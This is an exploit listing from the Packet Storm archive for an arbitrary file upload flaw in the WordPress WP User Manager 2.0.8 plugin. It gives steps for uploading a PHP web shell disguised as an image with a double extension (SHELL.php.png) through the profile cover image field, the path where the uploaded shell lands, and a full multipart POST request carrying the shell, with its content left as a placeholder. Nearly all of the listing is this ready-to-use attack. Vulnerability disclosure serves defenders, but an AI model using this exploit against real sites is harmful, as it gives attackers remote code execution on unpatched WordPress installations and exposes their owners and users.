exploit the possibilities

WordPress WP User Manager 2.0.8 Shell Upload

WordPress WP User Manager 2.0.8 Shell Upload
Posted Feb 5, 2019
Authored by Mr Winst0n

WordPress WP User Manager plugin version 2.0.8 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
MD5 | 3fca06ac6e8e03541e64f3fb8360717c

WordPress WP User Manager 2.0.8 Shell Upload

Change Mirror Download
# Exploit Title: Wordpress Plugin WP User Manager 2.0.8 - Arbitrary file upload
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 5, 2019
# Vendor Homepage: https://wpusermanager.com
# Software Link : https://wordpress.org/plugins/wp-user-manager/
# Tested Version: 2.0.8
# Tested on: Kali linux, Windows 8.1 / Wordpress 4.9.8

# Note: Free edition is vulnerable, other versions may also be affected.

# PoC:
# 1.- Login to site and go to your profile setting
# 2.- In profile cover image section, you can upload your shell by adding image extensions to end of your shell. (ex: SHELL.php.png)
# 3.- Click on "Update Profile"
# You can see your shell in /wp-content/uploads/wp-user-manager-uploads/[year]/[month]/SHELL.php.png


# PoC header:

POST /wordpress/?page_id=214&updated=success HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/?page_id=214&updated=success
Content-Type: multipart/form-data; boundary=---------------------------1794372498243154061698264842
Content-Length: 2142
Cookie: wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=root%7C1547649639%7CwJOz9suousR6JF7I0vqY76uoTRfAwA7bE0diqvzfxjP%7C8fbaaff802e0459d5aa4a1f581eb78053d63c4d024ef4d6048eb7c7c952b8ff5; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26post_dfw%3Doff; wp-settings-time-1=1547476851
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_cover"; filename="SHELL.php.jpeg"
Content-Type: image/jpeg

{{"SHELL CONTENT"}}

-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_email"

{{"Email"}}
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_firstname"


-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_lastname"


-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_nickname"

root
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_displayname"

display_nickname
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_website"


-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_description"


-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="wpum_form"

profile
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="step"

0
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="account_update_nonce"

df63baa04c
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/?page_id=214&updated=success
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="submit_account"

Update profile
-----------------------------1794372498243154061698264842--

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close